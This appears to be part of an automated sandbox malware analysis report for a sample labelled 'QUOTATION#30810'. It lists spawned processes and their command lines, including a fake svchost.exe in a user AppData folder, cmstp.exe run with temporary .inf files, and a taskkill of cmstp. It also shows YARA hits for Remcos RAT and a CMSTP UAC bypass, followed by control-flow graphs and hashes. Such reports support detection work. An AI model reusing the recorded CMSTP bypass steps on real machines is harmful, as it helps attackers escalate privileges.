                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:42
                                                                                                                                                                                    Start time:13:13:47
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                                                                    Imagebase:0x17f2cec0000
                                                                                                                                                                                    File size:948'209 bytes
                                                                                                                                                                                    MD5 hash:C828227DB6D7BC08DD8E9B7313A0E770
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000002A.00000002.1926881023.0000017F2EE1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:43
                                                                                                                                                                                    Start time:13:13:47
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:44
                                                                                                                                                                                    Start time:13:13:53
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\cmstp.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"c:\windows\system32\cmstp.exe" /au C:\windows\temp\54bmrp0l.inf
                                                                                                                                                                                    Imagebase:0x7ff6ca070000
                                                                                                                                                                                    File size:98'304 bytes
                                                                                                                                                                                    MD5 hash:4CC43FE4D397FF79FA69F397E016DF52
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:45
                                                                                                                                                                                    Start time:13:13:54
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
                                                                                                                                                                                    Imagebase:0x500000
                                                                                                                                                                                    File size:144'344 bytes
                                                                                                                                                                                    MD5 hash:417D6EA61C097F8DF6FEF2A57F9692DF
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000002D.00000002.1916087250.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:46
                                                                                                                                                                                    Start time:13:13:54
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 536 -p 6908 -ip 6908
                                                                                                                                                                                    Imagebase:0x7ff751e40000
                                                                                                                                                                                    File size:570'736 bytes
                                                                                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:48
                                                                                                                                                                                    Start time:13:13:57
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 6908 -s 1076
                                                                                                                                                                                    Imagebase:0x7ff751e40000
                                                                                                                                                                                    File size:570'736 bytes
                                                                                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:50
                                                                                                                                                                                    Start time:13:13:58
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\cmstp.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"c:\windows\system32\cmstp.exe" /au C:\windows\temp\xrlumlnf.inf
                                                                                                                                                                                    Imagebase:0x7ff6ca070000
                                                                                                                                                                                    File size:98'304 bytes
                                                                                                                                                                                    MD5 hash:4CC43FE4D397FF79FA69F397E016DF52
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:51
                                                                                                                                                                                    Start time:13:14:05
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:taskkill /IM cmstp.exe /F
                                                                                                                                                                                    Imagebase:0x7ff70d2d0000
                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:52
                                                                                                                                                                                    Start time:13:14:06
                                                                                                                                                                                    Start date:03/05/2024
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Reset < >

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:11.2%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                      Total number of Nodes:6
                                                                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                                                                      execution_graph 12171 7ffb4af9303a 12172 7ffb4af93049 VirtualProtect 12171->12172 12174 7ffb4af93121 12172->12174 12175 7ffb4af9090d 12176 7ffb4af9091f FreeConsole 12175->12176 12178 7ffb4af9099e 12176->12178

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: "c/$.M_^$EJ
                                                                                                                                                                                      • API String ID: 0-2264714594
                                                                                                                                                                                      • Opcode ID: 952a6fa681fcaf581f369d23d9dd0d814354232d6dc670ebb36eae72c05a877c
                                                                                                                                                                                      • Instruction ID: d55062c84fa6b286745cfabad11939d60ffb046836ac95d5f6909f93cef7110d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 952a6fa681fcaf581f369d23d9dd0d814354232d6dc670ebb36eae72c05a877c
                                                                                                                                                                                      • Instruction Fuzzy Hash: BBD127A3B0F99A4BE701BE7CE8551E4BB58EF8237171803FBD589CB087DD2568468394
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 180 7ffb4af9bee1-7ffb4af9bf1b 182 7ffb4af9bfac-7ffb4af9bfbf 180->182 183 7ffb4af9bf21-7ffb4af9bf66 call 7ffb4af9afc0 call 7ffb4af972c0 180->183 187 7ffb4af9c001-7ffb4af9c004 182->187 188 7ffb4af9bfc1-7ffb4af9bfd9 182->188 183->182 196 7ffb4af9bf68-7ffb4af9bf86 183->196 191 7ffb4af9c0a6-7ffb4af9c0b7 187->191 192 7ffb4af9c005-7ffb4af9c021 187->192 194 7ffb4af9c023-7ffb4af9c03a call 7ffb4af972c0 call 7ffb4af97a20 188->194 195 7ffb4af9bfdb-7ffb4af9bfff 188->195 201 7ffb4af9c0f9-7ffb4af9c106 191->201 202 7ffb4af9c0b9-7ffb4af9c0c7 191->202 192->194 194->191 212 7ffb4af9c03c-7ffb4af9c04e 194->212 195->187 196->182 199 7ffb4af9bf88-7ffb4af9bfab 196->199 205 7ffb4af9c1a3-7ffb4af9c1b1 201->205 206 7ffb4af9c107-7ffb4af9c111 201->206 204 7ffb4af9c0ca 202->204 208 7ffb4af9c0cb-7ffb4af9c0d9 204->208 218 7ffb4af9c1b3-7ffb4af9c1b5 205->218 219 7ffb4af9c1b6-7ffb4af9c1d4 205->219 209 7ffb4af9c113-7ffb4af9c114 206->209 210 7ffb4af9c117-7ffb4af9c121 206->210 211 7ffb4af9c123-7ffb4af9c145 call 7ffb4af9afc0 208->211 217 7ffb4af9c0db-7ffb4af9c0de 208->217 209->210 210->211 211->205 225 7ffb4af9c147-7ffb4af9c159 211->225 212->204 222 7ffb4af9c050 212->222 223 7ffb4af9c0e2-7ffb4af9c0f8 217->223 218->219 224 7ffb4af9c1d5-7ffb4af9c1d9 219->224 226 7ffb4af9c096-7ffb4af9c0a5 222->226 227 7ffb4af9c052-7ffb4af9c05a 222->227 223->201 228 7ffb4af9c223-7ffb4af9c263 call 7ffb4af9afc0 * 2 call 7ffb4af972c0 224->228 229 7ffb4af9c1db-7ffb4af9c206 224->229 225->224 235 7ffb4af9c15b 225->235 227->208 231 7ffb4af9c05c-7ffb4af9c061 227->231 232 7ffb4af9c2fc-7ffb4af9c30f 228->232 260 7ffb4af9c269-7ffb4af9c28b 228->260 229->232 233 7ffb4af9c20c-7ffb4af9c220 229->233 231->223 236 7ffb4af9c063-7ffb4af9c084 call 7ffb4af97660 231->236 245 7ffb4af9c351 232->245 246 7ffb4af9c311-7ffb4af9c326 232->246 233->228 239 7ffb4af9c15d-7ffb4af9c17b call 7ffb4af97660 235->239 240 7ffb4af9c1a1-7ffb4af9c1a2 235->240 236->191 247 7ffb4af9c086-7ffb4af9c094 236->247 239->205 253 7ffb4af9c17d-7ffb4af9c1a0 239->253 251 7ffb4af9c352-7ffb4af9c359 245->251 254 7ffb4af9c328-7ffb4af9c33e 246->254 255 7ffb4af9c35b-7ffb4af9c35e 246->255 247->226 251->255 253->240 254->251 257 7ffb4af9c340-7ffb4af9c350 254->257 258 7ffb4af9c360-7ffb4af9c370 255->258 259 7ffb4af9c372-7ffb4af9c37e 255->259 261 7ffb4af9c38e-7ffb4af9c397 257->261 258->261 259->261 262 7ffb4af9c380-7ffb4af9c38b 259->262 260->232 264 7ffb4af9c408-7ffb4af9c415 261->264 265 7ffb4af9c399-7ffb4af9c39b 261->265 262->261 266 7ffb4af9c417-7ffb4af9c42a 264->266 265->266 267 7ffb4af9c39d 265->267 268 7ffb4af9c431-7ffb4af9c463 call 7ffb4af9afc0 call 7ffb4af972c0 266->268 269 7ffb4af9c42c call 7ffb4af9afc0 266->269 270 7ffb4af9c3e3-7ffb4af9c407 267->270 271 7ffb4af9c39f-7ffb4af9c3b7 call 7ffb4af97660 267->271 273 7ffb4af9c569-7ffb4af9c588 268->273 284 7ffb4af9c469-7ffb4af9c489 268->284 269->268 270->273 274 7ffb4af9c40d-7ffb4af9c42c call 7ffb4af9afc0 270->274 271->270 285 7ffb4af9c58a-7ffb4af9c59a 273->285 286 7ffb4af9c551-7ffb4af9c568 273->286 274->268 291 7ffb4af9c50a-7ffb4af9c51b 284->291 292 7ffb4af9c48b-7ffb4af9c4ab 284->292 289 7ffb4af9c5e4-7ffb4af9c626 call 7ffb4af9afc0 * 2 call 7ffb4af972c0 285->289 290 7ffb4af9c59c-7ffb4af9c5c7 285->290 293 7ffb4af9c75e-7ffb4af9c7b3 289->293 318 7ffb4af9c62c-7ffb4af9c64a 289->318 290->293 294 7ffb4af9c5cd-7ffb4af9c5e3 290->294 296 7ffb4af9c51c-7ffb4af9c528 291->296 292->296 297 7ffb4af9c4ad-7ffb4af9c4b2 292->297 313 7ffb4af9c886-7ffb4af9c891 293->313 314 7ffb4af9c7b9-7ffb4af9c80e call 7ffb4af9afc0 * 2 call 7ffb4af972c0 293->314 294->289 299 7ffb4af9c52f-7ffb4af9c530 296->299 300 7ffb4af9c52a call 7ffb4af9b990 296->300 301 7ffb4af9c4b4-7ffb4af9c4e6 call 7ffb4af97660 297->301 302 7ffb4af9c533-7ffb4af9c53f 297->302 299->302 300->299 301->273 312 7ffb4af9c4ec-7ffb4af9c52a call 7ffb4af9b990 301->312 302->273 303 7ffb4af9c541-7ffb4af9c54d 302->303 303->286 312->299 322 7ffb4af9c893-7ffb4af9c895 313->322 323 7ffb4af9c896-7ffb4af9c8db 313->323 314->313 349 7ffb4af9c810-7ffb4af9c83b 314->349 318->293 320 7ffb4af9c650-7ffb4af9c66a 318->320 325 7ffb4af9c6c3 320->325 326 7ffb4af9c66c-7ffb4af9c66f 320->326 322->323 335 7ffb4af9c965-7ffb4af9c977 323->335 336 7ffb4af9c8e1-7ffb4af9c921 call 7ffb4af9afc0 call 7ffb4af972c0 323->336 327 7ffb4af9c734 325->327 328 7ffb4af9c6c5-7ffb4af9c6ca 325->328 331 7ffb4af9c6f0-7ffb4af9c732 call 7ffb4af9b990 326->331 332 7ffb4af9c671-7ffb4af9c68a 326->332 327->293 338 7ffb4af9c736-7ffb4af9c749 327->338 333 7ffb4af9c6cc-7ffb4af9c6eb call 7ffb4af97660 328->333 334 7ffb4af9c74b-7ffb4af9c75d 328->334 331->327 339 7ffb4af9c6a5-7ffb4af9c6b7 332->339 340 7ffb4af9c68c-7ffb4af9c6a3 332->340 333->331 355 7ffb4af9c9b9 335->355 356 7ffb4af9c979-7ffb4af9c9b7 335->356 336->335 364 7ffb4af9c923-7ffb4af9c93c call 7ffb4af99410 336->364 338->334 345 7ffb4af9c6bb-7ffb4af9c6c1 339->345 340->345 345->325 353 7ffb4af9c87a-7ffb4af9c885 349->353 354 7ffb4af9c83d-7ffb4af9c84f 349->354 354->313 361 7ffb4af9c851-7ffb4af9c877 354->361 358 7ffb4af9ca16-7ffb4af9ca2e 355->358 359 7ffb4af9c9bb-7ffb4af9ca14 call 7ffb4af98250 355->359 356->355 370 7ffb4af9cb29-7ffb4af9cb33 358->370 359->358 361->353 369 7ffb4af9c941-7ffb4af9c951 364->369 373 7ffb4af9c953-7ffb4af9c964 369->373 371 7ffb4af9ca33-7ffb4af9ca3e 370->371 372 7ffb4af9cb39-7ffb4af9cb3f 370->372 375 7ffb4af9ca44-7ffb4af9ca8d 371->375 376 7ffb4af9cb40-7ffb4af9cb4e 371->376 385 7ffb4af9caaa-7ffb4af9caac 375->385 386 7ffb4af9ca8f-7ffb4af9caa8 375->386 381 7ffb4af9cb4f-7ffb4af9cb51 376->381 382 7ffb4af9cb54-7ffb4af9cb59 381->382 383 7ffb4af9cb53 381->383 383->382 387 7ffb4af9caaf-7ffb4af9cabc 385->387 386->387 389 7ffb4af9cabe-7ffb4af9cada 387->389 390 7ffb4af9cb21-7ffb4af9cb26 387->390 389->381 393 7ffb4af9cadc-7ffb4af9cb1c call 7ffb4af99760 389->393 390->370 393->390
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: #uL
                                                                                                                                                                                      • API String ID: 0-1014397383
                                                                                                                                                                                      • Opcode ID: 078f29ec6569972aa3318a401a62c410444d86c02d8e135c514f4c2428ef0e5f
                                                                                                                                                                                      • Instruction ID: 22f6b9426b8c7cdb8d53f3b4a5457150ca377c7605e3267a6135dc0aecf3be5c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 078f29ec6569972aa3318a401a62c410444d86c02d8e135c514f4c2428ef0e5f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3EA213B191CA498FE359EF38C4A44A5B7F5FF95301B2445FED08AC72E6EA35A842C740
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 551 7ffb4af9ee79-7ffb4af9eead 554 7ffb4af9eeb5-7ffb4af9eeee 551->554 556 7ffb4af9eef0-7ffb4af9eef5 554->556 557 7ffb4af9ef5f-7ffb4af9ef75 call 7ffb4af9afc0 554->557 558 7ffb4af9ef76-7ffb4af9ef8a 556->558 559 7ffb4af9eef7-7ffb4af9ef11 call 7ffb4af97660 556->559 570 7ffb4af9ef77-7ffb4af9ef8a 557->570 571 7ffb4af9ef8f-7ffb4af9ef9a 557->571 562 7ffb4af9f028-7ffb4af9f02a 558->562 564 7ffb4af9f02c-7ffb4af9f031 562->564 565 7ffb4af9f09b-7ffb4af9f0a0 562->565 568 7ffb4af9f033-7ffb4af9f04f 564->568 569 7ffb4af9f0b2 564->569 565->569 572 7ffb4af9f0b4-7ffb4af9f0b5 569->572 573 7ffb4af9f0b8-7ffb4af9f106 call 7ffb4af9afc0 * 2 call 7ffb4af972c0 569->573 570->562 574 7ffb4af9ef9c-7ffb4af9efaf 571->574 575 7ffb4af9efb1-7ffb4af9efbc 571->575 572->573 590 7ffb4af9f289-7ffb4af9f2e3 573->590 591 7ffb4af9f10c-7ffb4af9f12a 573->591 574->562 578 7ffb4af9efbe-7ffb4af9efd0 575->578 579 7ffb4af9efd2-7ffb4af9eff1 575->579 578->562 579->562 582 7ffb4af9eff3-7ffb4af9f024 579->582 582->562 603 7ffb4af9f416-7ffb4af9f473 590->603 604 7ffb4af9f2e9-7ffb4af9f344 call 7ffb4af9afc0 * 2 call 7ffb4af972c0 590->604 591->590 592 7ffb4af9f130-7ffb4af9f14f 591->592 596 7ffb4af9f1d0-7ffb4af9f1da 592->596 597 7ffb4af9f151-7ffb4af9f170 592->597 601 7ffb4af9f1dc-7ffb4af9f1df 596->601 602 7ffb4af9f20e-7ffb4af9f25f call 7ffb4af9b990 596->602 599 7ffb4af9f172-7ffb4af9f177 597->599 600 7ffb4af9f1e1-7ffb4af9f1f6 597->600 605 7ffb4af9f1f8-7ffb4af9f209 599->605 606 7ffb4af9f179-7ffb4af9f1c8 call 7ffb4af97660 599->606 600->605 601->602 602->590 615 7ffb4af9f261-7ffb4af9f288 602->615 619 7ffb4af9f479-7ffb4af9f4ce call 7ffb4af9afc0 * 2 call 7ffb4af972c0 603->619 620 7ffb4af9f52e-7ffb4af9f539 603->620 604->603 630 7ffb4af9f34a-7ffb4af9f3a0 604->630 605->602 611 7ffb4af9f20b-7ffb4af9f20c 605->611 606->600 618 7ffb4af9f1ca-7ffb4af9f1cf 606->618 611->602 618->596 619->620 637 7ffb4af9f4d0-7ffb4af9f4f4 619->637 628 7ffb4af9f53b-7ffb4af9f53d 620->628 629 7ffb4af9f53e-7ffb4af9f549 620->629 628->629 630->603 632 7ffb4af9f3a2-7ffb4af9f3ed call 7ffb4af9b990 630->632 632->603 638 7ffb4af9f3ef-7ffb4af9f415 632->638 639 7ffb4af9f4f6-7ffb4af9f506 637->639 640 7ffb4af9f522-7ffb4af9f52d 637->640 639->620 641 7ffb4af9f508-7ffb4af9f51f 639->641 641->640
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: OL_H
                                                                                                                                                                                      • API String ID: 0-3734465514
                                                                                                                                                                                      • Opcode ID: cfe54d595fad8882095e071fd212a52858b2b38ee82e597444bcd85eddcc0914
                                                                                                                                                                                      • Instruction ID: 37960301f149beda599124789813f5e5a94f6027b7465afcfa134df033912245
                                                                                                                                                                                      • Opcode Fuzzy Hash: cfe54d595fad8882095e071fd212a52858b2b38ee82e597444bcd85eddcc0914
                                                                                                                                                                                      • Instruction Fuzzy Hash: A6223471A1CB464FD319EF38C4910A1B7E6FBD5305B2486BEE486C72D6EA34E846C781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: fish
                                                                                                                                                                                      • API String ID: 0-1064584243
                                                                                                                                                                                      • Opcode ID: 281601d0579cbe0109181cb753896aaeea32d7fb81f1b38c14ac401e92a702a6
                                                                                                                                                                                      • Instruction ID: 220844831050f21c76631cf6cbea6a7753ad7c00dc7677b30d7fd2ec0c3b61c7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 281601d0579cbe0109181cb753896aaeea32d7fb81f1b38c14ac401e92a702a6
                                                                                                                                                                                      • Instruction Fuzzy Hash: CDE15CB1A0DA8A0FE75DAE78D8A11B577F5EFA5311B1401FEE48AC31D7DD14AC068381
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 7787e602e0213a4d9e860743d19bc1e2ff04febc17ea9195bda2156e28d2b392
                                                                                                                                                                                      • Instruction ID: ecf82c8bb364d6e58a75b613af977474413ee1a75c8b2db4d13e2b412d5169b8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7787e602e0213a4d9e860743d19bc1e2ff04febc17ea9195bda2156e28d2b392
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B52A770A1CA098FDB68EF38D4A5A7977E9EF59341F2401BDE44EC72D2DE24AC428741
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 2d0ccf3d84741d2a66a09bf6252a78baeb202d4f9eb591f1efb85c693f405b10
                                                                                                                                                                                      • Instruction ID: 3302edf15c9d31680de45352f9b7876ce0268e4f05ffb601c21deabdaa431a49
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d0ccf3d84741d2a66a09bf6252a78baeb202d4f9eb591f1efb85c693f405b10
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E3271A1B19A4A4FE784FE78C4A56B9B3E6FF98310F5441B9D80DC32D6DD38AC418741
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: c1d68242eabe19211679fa99e7f776e2520d0a0d48c05c0458864625b70fc048
                                                                                                                                                                                      • Instruction ID: a5f029dc30bd5dd73aff6eb332985bc8b56ec39d43925a69007e6093979d9979
                                                                                                                                                                                      • Opcode Fuzzy Hash: c1d68242eabe19211679fa99e7f776e2520d0a0d48c05c0458864625b70fc048
                                                                                                                                                                                      • Instruction Fuzzy Hash: A2022DB591D94A4FE3A8EE3CD9575E4B7D5EF85320B2403F9D08DC72E2DA18AC064781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 0dca9c5c9212b2337343a4996547ed62ceef72cd28dfc5b6566d48573c8f4962
                                                                                                                                                                                      • Instruction ID: e7d41e8f94b6473bdc5b7d952ae8a3c3c2328fe124a27b9b523810c7dde7d940
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0dca9c5c9212b2337343a4996547ed62ceef72cd28dfc5b6566d48573c8f4962
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BB1557091CB864FE31DDF39C4A50B1B7E6EFD5311B2486BED4CAC72E5CA28A4468781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
